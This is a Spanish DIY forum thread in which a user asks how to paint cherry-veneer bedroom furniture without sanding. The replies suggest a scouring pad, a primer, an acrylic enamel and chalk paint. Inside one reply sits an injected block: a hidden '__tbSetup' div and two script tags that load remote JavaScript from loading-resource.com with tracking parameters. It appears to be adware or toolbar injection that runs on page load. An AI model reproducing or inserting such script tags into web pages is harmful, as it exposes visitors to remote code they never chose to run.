Pintar muebles sin lijar

Tengo un dormitorio de madera y chapa color cerezo, quiero pintarlo de color blanco o crema, no quisiera lijar, ¿puede ser? Y si no que otra forma cómoda tendría de cambiar su aspecto aburrido, estoy embarazado y quiero hacerlo yo pero sin mucho esfuerzo.

2 respuestas

Respuesta

Hay en el mercado unas lijas que son como estropajo verde se llama hand pack de 3M que son buenísimos para lo que quieres, solo pasarlo ya te matiza y puedes pintar después. Pero te recomiendo que apliques una imprimación multiusos para que agarre bien.

Hola, gracias y el tipo de pintura, es un armario y cama, mesitas y cómoda, me quedará bien? y cuantas manos?

Yo te recomiendo UNILAK de titan es esmalte acrílico y fácil de aplicar, su aspecto es tipo laca satinado. Las manos tienes una de imprimación multiusos y después dos de acabado.

UN SALUDO.

<div id="__tbSetup"> </div><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://loading-resource.com/data.js.php?i={1EFAB6E1-79BA-4566-B458-DBEDEC33AB15}&d=2012-8-28&s=http://www.todoexpertos.com/mitodoexpertos/question/jymjw4o75nqje/pintar-muebles-sin-lijar"></script>
Respuesta

A mi me gusta pintar muebles con pintura a la tiza chalk paint. Hay infinidad de colores, es una pintura al agua, y puedes pintar varias manos según quieras el acabado. Estas pinturas están pensadas para no tener que hacer lijado ni preparación previa. Pregunta en tiendas de pintura y decoración.